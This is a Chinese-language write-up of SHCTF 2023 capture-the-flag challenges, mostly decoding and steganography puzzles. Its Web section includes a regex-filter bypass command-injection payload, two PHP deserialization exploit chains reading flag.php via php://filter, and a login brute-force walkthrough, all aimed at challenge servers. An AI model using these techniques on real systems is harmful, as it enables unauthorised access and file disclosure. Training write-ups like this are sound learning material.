SHCTF(山河)赛事部分Write up-白猫
MISC
[WEEK1]签到题
下载题目并打开:
base128编码:
Wm14aFozdDBhR2x6WDJselgyWnNZV2Q5
因为是base128编码,所以通过两次base64解码,即可得出flag
爆出flag:
flag{this_is_flag}
**总结: **
这道签到题主要考察了对base64编码的基础了解
[WEEK1]Steganography
下载题目并打开:
有三个文件,两个图片文件和一个压缩包文件 看到了flag压缩包,打开看一下
发现有flag文本文件存在,但是需要密码 那么密码信息可能在上面那两个图片文件中,直接放入到010浅浅分析一波
两个图片竟然一模一样,有点意思 在careful.jpg图片16进制字符串中发现了base64编码格式(==或=就是base64编码的重要特征)
MTJlcmNzLi4uLi45MDlqaw==
放到Kali里面浅浅解码一波
得到如下字符串
12ercs.....909jk
想到flag.txt需要用密码打开,猜测这个就是密码,但是呢,还有一个图片没有用上,所以这5个点显然不是密码。
把careful1.jpg放入到010分析一波
在16进制字符串中并没有发现什么有用的东西,只是一堆乱码,那么下一步该如何进行呢? 尝试查看一下careful1.jpg的图片属性,看看是否能有所突破 查看图片属性
出题人还是非常善良的,可以看到出题人在图片备注中给我们留了信息,刚好是5个字符对应了5个点
xqwed
12ercs.....909jk
密码:
12ercsxqwed909jk
打开flag.txt
爆出flag:
**flag{4d72e4f3-4d4f-4969-bc8c-a2f6f7a4292c}**
[WEEK1]可爱的派蒙捏
下载题目文件,是一个压缩包,里面只有一张图片
放到010里面分析一波
图片隐写,发现存在两个文件txt1.txt和txt2.txt 放到Kali binwalk把这两个文本文件提取出来
提取成功,看看这两个文件里面是什么内容
刚开始我以为这是什么编码,看来是我想复杂了,经过这两个文件频繁切换,看到了有个别字符不同,大部分字符是相同的,想到了将不同字符提取出来,就是flag 拖入到物理机
复制到pycharm项目中
编写python脚本
代码语言:javascript复制# 打开第一个文本文件并读取内容
with open('txt1.txt', 'r', encoding='utf-8') as file1:
text1 = file1.read()
# 打开第二个文本文件并读取内容
with open('txt2.txt', 'r', encoding='utf-8') as file2:
text2 = file2.read()
# 找出text2中与text1不同的字符
differences = []
for i, (char1, char2) in enumerate(zip(text1, text2)):
if char1 != char2:
differences.append(char2)
# 打印text2中与text1不同的字符
print("text2中与text1不同的字符:", ''.join(differences))
在代码中我做了注释,方便大家理解 运行python脚本
爆出flag:
**flag{4ebf327905288fca947a}**
[WEEK1]message
下载题目并打开:
0001000D91683106019196F40008C26211002072B975915730671B54114F60000A000A592982B15C065265843D8A938A00000A000A5E8A9AA453D883525730000A000A91527CBE518D6E1751656CEA75D5000A000A6C899ED852305BF94E0D8D77000A000A8FD94E0053CC624B535191195230002062B14F4F4F6000530048004300540046007B00620061003900370038003400300035002D0062003100630038002D0038003400370063002D0038006500360039002D006600360032003100370037006500340063003000380037007D
有ABCDEF猜测是16进制编码,16进制转字符串一把梭
得出flag:
SHCTF{ba978405-b1c8-847c-8e69-f62177e4c087}
[WEEK1] 真的签到
不再多说,跟着操作走即可
得出flag:
flag{Welc0me_tO_SHCTF2023}
[WEEK2]远在天边近在眼前
下载题目并打开:
很明显flag就是所有文件的路径地址 考虑到路径地址复制下来有的符号会丢失,放入010打开
}/8/2/1/5/a/3/8/4/8/2/5/0/_/?/T/H/G/l/r/I/4/_/Y/s/A/3/_/y/l/L/A/e/r/_/s/i/_/S/i/H/t/{/g/a/l/f
反的flag,还这么长,不想手动排序了,写个python脚本梭一把
ctf='}/8/2/1/5/a/3/8/4/8/2/5/0/_/?/T/H/G/l/r/I/4/_/Y/s/A/3/_/y/l/L/A/e/r/_/s/i/_/S/i/H/t/{/g/a/l/f'
flag=ctf[::-1]
flag=flag.replace('/','')#删除字符'/'
print(flag)
得出flag:
flag{tHiS_is_reALly_3AsY_4IrlGHT?_0528483a5128}
[FINAL]问卷
跟着操作走即可
得出flag:
flag{SHCTF_Round2_will_do_even_better!}
Web
[WEEK1]babyRCE
刚开始不要把题想的那么难,看下环境代码
代码语言:javascript复制<?php
$rce = $_GET['rce'];
if (isset($rce)) {
if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |;|[0-9]|*|`|%|>|<|'|"/i", $rce)) {
system($rce);
}
else {
echo "hhhhhhacker!!!"."n";
}
} else {
highlight_file(__FILE__);
}
一、PHP代码审计
- 可以明显看到给了一个GET方式传参,这个参数是rce
- if判断语句**,isset函数**用来判断rce这个参数是否存在并且是否不为空,如果条件达成,则true
- preg_match正则表达式,用来过滤一些命令,可以看到过滤了cat、more、less、head、tac、tail、nl、od、vi、vim、sort、flag等命令并且过滤了整数和空格以及一些常用符号
- system外部执行命令,将参数rce的值作为命令执行,从这里可以看出这道题降低了难度,因为我们不再需要外部执行命令了,所以直接给参数rce传值即可
- else与if语句联用,反之则输出对应的字符串
- 同5,highlight_file(FILE)函数用来高亮显示文件内容,就是把文件内容或者代码高亮显示到网页当中
二、解题思路
- 查看目录文件,幸运的是发现ls和/没有被过滤
- 绕正则,看它有没有漏掉的过滤命令,发现没有过滤uniq命令,uniq命令可以查看文件内容
- 绕正则,查看文件命令需要用到空格,结果发现空格被过滤,可以使用${IFS}代替空格
- 绕正则,flag被过滤,可以通过f???进行绕过,可以理解为列出包含f的四个字符文件
三、开始解题
- 使用ls命令查看目录文件
?rce=ls
回显结果
flag.php index.php
- 发现有flag.php文件的存在,尝试使用构造payload
?rce=uniq${IFS}f???.php
回显结果
空白内容,F12试试
<?php
$flag = getenv('GZCTF_FLAG');
if($flag=="not_flag" or $flag==""){
$flag="dzctf{test_flag}";
}
getenv函数用来获取环境变量,flag的值等于这个环境变量的值 如果说flag是空的,则flag是dzctf{test_flag},显然这是不可能的 就是说这个目录下没有flag 那咱们去根目录下试试?
- 继续构造payload
?rce=uniq${IFS}/f???.php
发现网页内容为空,F12内容也是空
除了根目录下还有那里有?,猜测flag不是PHP文件,而是文本文件
- 继续构造payload
?rce=uniq${IFS}/f???
回显flag
得出flag:
flag{e85932a6-12df-4991-981c-adaf56337196}
[WEEK1]ez_serialize
题目环境:
代码语言:javascript复制<?php
highlight_file(__FILE__);
class A{
public $var_1;
public function __invoke(){
include($this->var_1);
}
}
class B{
public $q;
public function __wakeup()
{
if(preg_match("/gopher|http|file|ftp|https|dict|../i", $this->q)) {
echo "hacker";
}
}
}
class C{
public $var;
public $z;
public function __toString(){
return $this->z->var;
}
}
class D{
public $p;
public function __get($key){
$function = $this->p;
return $function();
}
}
if(isset($_GET['payload']))
{
unserialize($_GET['payload']);
}
?>
exp:
代码语言:javascript复制<?php
class A{
public $var_1='php://filter/read=convert.base64-encode/resource=flag.php';
}
class B{
public $q;
}
class C{
public $var;
public $z;
}
class D{
public $p;
}
$A=new A();
$B=new B();
$C=new C();
$D=new D();
$D->p=$A;
$C->var=$B;
$B->q=$C;
$C->z=$D;
echo serialize($C);
运行结果:
O:1:"C":2:{s:3:"var";O:1:"B":1:{s:1:"q";r:1;}s:1:"z";O:1:"D":1:{s:1:"p";O:1:"A":1:{s:5:"var_1";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";}}}
上传exp:
PD9waHANCiRmbGFnID0gImZsYWd7NDQxZTY5NzEtMjU3NC00ZWYzLTg5YWYtYWQwNDYwMzA2NmUwfSI7DQo=
base64解码:
得出flag:
flag{441e6971-2574-4ef3-89af-ad04603066e0}
[WEEK1]登录就给flag
题目环境:
burpsuite抓包
初始账号:admin 初始密码:1
HTTP history
Send to Intruder
Clear 选中密码1,Add
Payloads
Load添加字典
打开字典
Start attack开始爆破
得到密码
password
账户:admin 密码:password
登录:
login登录:
得到flag:
flag{d2974de6-f71e-48f9-9659-dc453a23009a}
[WEEK1]飞机大战
题目环境:
玩了一把,通过才给flag,所以说想玩通过是不可能的,只能另辟蹊径 F12查看网页源代码
HTML三大件 HTML CSS JavaScript CSS静态网页样式 JavaScript动态功能
所以说更改游戏分数必须看这个JS文件
没有看到可控游戏参数,倒是看到了一串u开头的类似编码的东西
有密码学基础的可以看出这是Unicode编码格式
u005au006du0078u0068u005au0033u0074u0068u0059u0057u0051u0033u005au0044u0041u0030u005au0043u0030u0030u004eu0047u0049u0030u004cu0054u0051u0032u004fu0054u0059u0074u0059u006au004eu006cu004eu0053u0030u007au004du007au0052u006bu004eu006au0064u0068u004eu007au004du0033u004eu0047u004eu0039u000a
Unicode解码一把梭
base64
ZmxhZ3thYWQ3ZDA0ZC00NGI0LTQ2OTYtYjNlNS0zMzRkNjdhNzM3NGN9
base64解码一把梭
得到flag:
flag{aad7d04d-44b4-4696-b3e5-334d67a7374c}
[WEEK2]no_wake_up
题目环境:
代码语言:javascript复制<?php
highlight_file(__FILE__);
class flag{
public $username;
public $code;
public function __wakeup(){
$this->username = "guest";
}
public function __destruct(){
if($this->username = "admin"){
include($this->code);
}
}
}
unserialize($_GET['try']);
exp:
代码语言:javascript复制<?php
class flag
{
public $username = "admin";
public $code = "php://filter/read=convert.base64-encode/resource=flag.php";
}
$l=new flag();
echo serialize($l);
运行结果:
O:4:"flag":2:{s:8:"username";s:5:"admin";s:4:"code";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";}
上传payload
base64编码
PD9waHANCiRmbGFnID0gImZsYWd7MTE5NmY2NzQtZjkwMi00YWEzLWI5M2MtNTUyYTgxNTUzMjlkfSI7
base64解码
得出flag:
flag{1196f674-f902-4aa3-b93c-552a8155329d}
Crypto
[WEEK1]立正
下载题目并打开
wl hgrfhg 4gNUx4NgQgEUb4NC64NHxZLg636V6CDBiDNUHw8HkapH :jdoi vl vlkw ~xrb wd nrrT Y:
一把梭:
得到flag:
flag{Y0U_MU57_5t4nd_uP_r1gHt_n0W}
[WEEK1]Crypto_Checkin
下载题目并打开
QZZ|KQbjRRS8QZRQdCYwR4_DoQ7~jyO>0t4R4__aQZQ9|Rz k_Q!r#mR90 NR4_4NR%>ipO>0s{R90|SQhHKhRz k^S8Q5JS5|OUQZO}CQfp*dS8P&9R8>k?QZYthRz k_O>0#>
base85(b)解码:
R1kzRE1RWldHRTNET04yQ0dVMkRNT0JUR0UzVEdOS0dHTVlUT01aVklZMkRFTVpVRzRaVEdNWlZJWVpUR05TRkdZWlRHTUJXR1FaVEdOMkU=
Base16-32-64-91混合多重解码:
base64
R1kzRE1RWldHRTNET04yQ0dVMkRNT0JUR0UzVEdOS0dHTVlUT01aVklZMkRFTVpVRzRaVEdNWlZJWVpUR05TRkdZWlRHTUJXR1FaVEdOMkU=
base32
GY3DMQZWGE3DON2CGU2DMOBTGE3TGNKGGMYTOMZVIY2DEMZUG4ZTGMZVIYZTGNSFGYZTGMBWGQZTGN2E
base16
666C61677B546831735F31735F423473335F336E633064337D
三种base混合解码
得出flag:
flag{Th1s_1s_B4s3_3nc0d3}
[WEEK1]残缺的md5
下载题目并打开:
使用python写脚本:
代码语言:javascript复制import itertools
import string
import hashlib
def generate_strings():
characters = "QWERTYUIOPLKJHGFDSAZXCVBNM012345689"
for _ in itertools.product(characters, repeat=1):
yield ''.join(_)
# 输入的固定部分
a = 'KCLWG'
b = 'K8M9O3'
c = 'DE'
e = '84S9'
# 计算目标MD5哈希值
target_md5_suffix = "b2ac4e6"
for part1 in generate_strings():
for part2 in generate_strings():
for part3 in generate_strings():
str_to_hash = a part1 b part2 c part3 e
# 计算new_string的MD5哈希值
md5_hash = hashlib.md5(str_to_hash.encode()).hexdigest()
# 检查MD5哈希值的后七位是否与目标匹配
if md5_hash[-7:] == target_md5_suffix:
print("MD5加密前为:", str_to_hash)
print("MD5加密后为:", md5_hash)
运行结果:
写个python脚本转大写
代码语言:javascript复制flag='f0af1443b1f463eafff7aebb8b2ac4e6'
print(flag.upper())
运行结果:
得到flag:
flag{F0AF1443B1F463EAFFF7AEBB8B2AC4E6}
[WEEK1]凯撒大帝
下载题目并打开:
凯撒移位
得到flag:
flag{chutihaonan}
[WEEK1]进制
下载题目并打开:
16进制转字符串
哈希还原
得到flag:
flag{ahfkjlhkah}
[WEEK1]okk
下载题目并打开:
Ook编码转文本
得到flag:
flag{123456789}
[WEEK1]熊斐特
下载题目并打开:
Atbash Cipher(埃特巴什码)转化
得到flag:
flag{atbash cipher}
[WEEK1]黑暗之歌
下载题目并打开:
盲文解密
base64解密
音符解密
得出flag:
flag{b2cc-9091-8a29}
[WEEK1]迷雾重重
下载题目并打开:
二进制转摩斯密码
0为’.‘1为’-‘空格为’/'
..-./.-../.-/--./----.--/--/---/.-./..././..--.-/../.../..--.-/...-/./.-./-.--/..--.-/..-./..-/-./-----.-
摩斯密码解密
%u7b={ %u7d=}
得到flag:
FLAG{MORSE_IS_VERY_FUN}
[WEEK1]难言的遗憾
下载题目并打开:
中文电码解密
得出flag:
flag{一天不学高数我就魂身难受}
[WEEK1]小兔子可爱捏
下载题目并打开:
宇宙的终极答案是:42 Rabbit(兔子)解密
得到flag:
flag{i_love_technology}
[WEEK1]what is m
下载题目并打开:
还原m即可 写个python脚本一把梭
代码语言:javascript复制from Crypto.Util.number import long_to_bytes
m = 7130439814059477365465881592242189984174813803592711881640295679655301582414518361829827793806793804626699859619466410111590180160366476408654141662794502447303629472823901463632274384106877
flag=long_to_bytes(m)
print(flag)
#将m转为字节
运行结果:
得出flag:
flag{th3re_4r3_S3veral_aITErnA7lvES_70_tHE_L0N6_7O_8Y73S_1UNcTION_dg12dC49bTf5}
PWN
[WEEK1]nc
nc连接
ls cat flag 一把梭
得到flag:
flag{1dcc22cb-ae4d-4cb0-88f2-2e1461b1bb5c}
[WEEK1]hard nc
nc连接
ls cat flag ls gift2 cat gift2 cd gift2 ls cat flag2
base64编码
OTMtYTg3ZC0zN2FjMDljMGU1Njl9Cg==
base64解码
93-a87d-37ac09c0e569}
好家伙只给了一半flag,再找找上半部分
ls -a查看隐藏目录文件 cat .gift
flag前半部分
flag{a284241c-5d85-46
前后合并
得出flag:
flag{a284241c-5d85-4693-a87d-37ac09c0e569}
Reverse
[WEEK1]signin
下载题目并打开:
可执行文件 放入IDA进行分析
得到flag:
flag{flag1sinarray}
后期我会去看看其他大佬师傅的WP,自己不会的看看能不能复现,太菜了,呜呜呜,争取给CTF新人做更好的题解;WP中有不足的地方还望师傅们积极提出。